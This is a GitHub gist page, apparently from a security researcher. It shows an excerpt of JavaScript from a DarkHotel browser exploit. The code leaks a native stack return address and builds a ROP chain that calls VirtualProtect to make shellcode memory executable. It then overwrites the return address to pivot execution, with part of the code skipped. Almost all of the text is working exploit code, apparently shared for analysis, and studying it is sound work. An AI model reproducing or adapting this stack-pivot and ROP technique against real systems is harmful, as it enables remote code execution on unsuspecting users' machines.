Created
July 10, 2020 06:38
-
-
Save tahaconfiant/4d0d8783c2277ad0c59fdc4b921cb069 to your computer and use it in GitHub Desktop.
darkhotel_stack_pivot
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var aA = S(O, V(O)); | |
var aB = ((aA.charCodeAt(4) << 16) | aA.charCodeAt(3)) - 0x44; // <--- points to a return address in the native stack | |
for (var A = 0; A < 10; A++) V(aB - (0x1000 * A)); | |
var aC = aB - 0x2000; // <--- will be used for the ROP chain layout | |
//<code skipped> | |
S(aC + 4, av + 1); // ret | |
S(aC + 4 + 4 + 0x18, av); // pop eax ret | |
S(aC + 4 + 4 + 0x1C, av + 1); // ret | |
S(aC + 4 + 4 + 0x20, au); // virtual protect @ | |
S(aC + 4 + 4 + 4 + 0x20, O + h);//shellcode address | |
S(aC + 4 + 4 + 4 + 4 + 0x20, O + h); //shellcode address | |
S(aC + 4 + 4 + 4 + 4 + 4 + 0x20, (m.length * c)); //shellcode size | |
S(aC + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, 0x40);//protect | |
S(aC + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, aC - 0x1000); | |
S(aB, aC); // <-- overwrites return address in the native stack |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment